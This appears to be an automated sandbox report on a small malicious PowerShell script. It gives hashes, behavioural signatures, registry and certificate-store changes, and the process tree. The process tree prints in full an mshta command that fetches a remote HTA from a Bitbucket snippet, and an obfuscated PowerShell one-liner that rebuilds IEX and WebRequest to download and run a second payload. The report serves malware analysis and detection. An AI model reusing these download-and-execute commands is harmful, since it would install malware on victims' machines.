Analysis
-
max time kernel
43s -
max time network
104s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
30-09-2022 23:48
Static task
static1
Behavioral task
behavioral1
Sample
code.ps1
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
code.ps1
Resource
win10v2004-20220901-en
General
-
Target
code.ps1
-
Size
138B
-
MD5
efa136867081936967a0ac27271b2fda
-
SHA1
756f0d9e09882c8531618458e5d582fd5b46fbad
-
SHA256
e4cda1631a3df7932fb319567b2696e096d1f59f66a6d1611436217943bd692e
-
SHA512
77e76132c86321792cb621cc9c9f298b59a6ee813553fb2199a1ea82c60549c95c38ed0574c25b40faecfcccdd7931134fae8817fa8ac30c0eb405e4a2eed711
Malware Config
Extracted
https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1944 868 POWERSHELL.exe -
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid process 4 956 mshta.exe 6 956 mshta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
POWERSHELL.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POWERSHELL.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exePOWERSHELL.exepid process 2016 powershell.exe 1944 POWERSHELL.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exePOWERSHELL.exedescription pid process Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 1944 POWERSHELL.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
powershell.execmd.exedescription pid process target process PID 2016 wrote to memory of 628 2016 powershell.exe cmd.exe PID 2016 wrote to memory of 628 2016 powershell.exe cmd.exe PID 2016 wrote to memory of 628 2016 powershell.exe cmd.exe PID 628 wrote to memory of 956 628 cmd.exe mshta.exe PID 628 wrote to memory of 956 628 cmd.exe mshta.exe PID 628 wrote to memory of 956 628 cmd.exe mshta.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /min mshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HPJSWDLAZGWFDZYDFHWGFRU = '[%9%{!)<60%7]643]%((!^]y%9%{!)<60%7]643]%((!^]t\+!{{@901}8-#+([)]#/=}&{0}#23{1=##<%9-+90*4+.IO.%9%{!)<60%7]643]%((!^]t{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6&{0}#23{1=##<%9-+90*4+{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6d\+!{{@901}8-#+([)]#/=}{)]<5/]9928(@-%*})\<$@]'.Replace('%9%{!)<60%7]643]%((!^]','S').Replace('\+!{{@901}8-#+([)]#/=}','E').Replace('{)]<5/]9928(@-%*})\<$@','R').Replace('_#=#9)<+/&53\+]}70#-*6','A').Replace('&{0}#23{1=##<%9-+90*4+','M');$HFVVYPXEVBJEIVAVHEPLSDU = ($HPJSWDLAZGWFDZYDFHWGFRU -Join '')|&('I'+'EX');$HKLNYCJAXBTERCXRLWVDDRR = '[$0[-_<#)(+}%]\3%7\(5&#y$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[+&=#*$)4$<3}!1<)@3##5=m.N+&=#*$)4$<3}!1<)@3##5=*^(!+72@//61)!18$/<%8[.W+&=#*$)4$<3}!1<)@3##5=bR+&=#*$)4$<3}!1<)@3##5=qu+&=#*$)4$<3}!1<)@3##5=$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[]'.Replace('$0[-_<#)(+}%]\3%7\(5&#','S').Replace('+&=#*$)4$<3}!1<)@3##5=','E').Replace('*^(!+72@//61)!18$/<%8[','T');$HHKOVSNBTTKFPLKUTNGTEHB = ($HKLNYCJAXBTERCXRLWVDDRR -Join '')|&('I'+'EX');$HTZCELDOJQNRIVJVBXAVZND = '\][0{2=!#**(#<)4$/{=^%r11+[/-}*(1}3(}]+(#)6[]a<!=7!}\7)9&$[[)/4/&[/&11+[/-}*(1}3(}]+(#)6[]'.Replace('\][0{2=!#**(#<)4$/{=^%','C').Replace('11+[/-}*(1}3(}]+(#)6[]','E').Replace('<!=7!}\7)9&$[[)/4/&[/&','T');$HJJPDTCBEJQGGUGWFGICSKF = '{!@{8=!@4!(52!5=$1_##*&5<22_0_)1\%*#}*(6[867tR&5<22_0_)1\%*#}*(6[867[={9}@&&6*48{8}6_+3%=*pon[={9}@&&6*48{8}6_+3%=*&5<22_0_)1\%*#}*(6[867'.Replace('{!@{8=!@4!(52!5=$1_##*','G').Replace('&5<22_0_)1\%*#}*(6[867','E').Replace('[={9}@&&6*48{8}6_+3%=*','S');$HYRGAIQZLYZNHUPAAKKHBKR = 'G!!((=#^55=^9&7^3$_4=1/t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@pon7({=\[#%*6@0088{}\43}@!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/am'.Replace('7({=\[#%*6@0088{}\43}@','S').Replace('!!((=#^55=^9&7^3$_4=1/','E').Replace('[%\*\][6!)-[8$5!41<#1_','R');$HSIYIVTRGVUTCUUELHVIWZX = '}2=29-^$/4!#%4_6^(9<@[&_/2\4*4=(\7_]}](4_\_)a^[<2_/^@429<&238}@][#=To&_/2\4*4=(\7_]}](4_\_)n^[<2_/^@429<&238}@][#='.Replace('}2=29-^$/4!#%4_6^(9<@[','R').Replace('&_/2\4*4=(\7_]}](4_\_)','E').Replace('^[<2_/^@429<&238}@][#=','D');&('I'+'EX')($HFVVYPXEVBJEIVAVHEPLSDU::new($HHKOVSNBTTKFPLKUTNGTEHB::$HTZCELDOJQNRIVJVBXAVZND('https://bitbucket.org/!api/2.0/snippets/tinypro/dk958p/b15a5d7c2c03c07fb8aac916623be0799dce12bf/files/black1.txt').$HJJPDTCBEJQGGUGWFGICSKF().$HYRGAIQZLYZNHUPAAKKHBKR()).$HSIYIVTRGVUTCUUELHVIWZX())1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD56278f56a1a3ea516c5629446f3f0bc6b
SHA1bd2aeb4e3c246d6386cadb098b0e4a0eed6f2503
SHA2563e68c0aeda067470b3dad0aae7433d9744a928b5dc1518a822e169c9673e6107
SHA5122c3d458c7a5def5a9f56c0e9cd228857077e9977da5d69ae2b572526216b088a57b1f35b459337e78756939baa9edcd56e0ee71f448899be89d3518bbbd793ca
-
memory/628-59-0x0000000000000000-mapping.dmp
-
memory/956-60-0x0000000000000000-mapping.dmp
-
memory/1944-65-0x000007FEF2C80000-0x000007FEF36A3000-memory.dmpFilesize
10.1MB
-
memory/1944-71-0x00000000020BB000-0x00000000020DA000-memory.dmpFilesize
124KB
-
memory/1944-70-0x00000000020B4000-0x00000000020B7000-memory.dmpFilesize
12KB
-
memory/1944-69-0x00000000020BB000-0x00000000020DA000-memory.dmpFilesize
124KB
-
memory/1944-68-0x00000000020B4000-0x00000000020B7000-memory.dmpFilesize
12KB
-
memory/1944-67-0x000000001B710000-0x000000001BA0F000-memory.dmpFilesize
3.0MB
-
memory/1944-66-0x000007FEF2060000-0x000007FEF2BBD000-memory.dmpFilesize
11.4MB
-
memory/2016-58-0x000000001B7A0000-0x000000001BA9F000-memory.dmpFilesize
3.0MB
-
memory/2016-62-0x000000000284B000-0x000000000286A000-memory.dmpFilesize
124KB
-
memory/2016-61-0x0000000002844000-0x0000000002847000-memory.dmpFilesize
12KB
-
memory/2016-54-0x000007FEFB731000-0x000007FEFB733000-memory.dmpFilesize
8KB
-
memory/2016-57-0x0000000002844000-0x0000000002847000-memory.dmpFilesize
12KB
-
memory/2016-56-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmpFilesize
11.4MB
-
memory/2016-55-0x000007FEF3AA0000-0x000007FEF44C3000-memory.dmpFilesize
10.1MB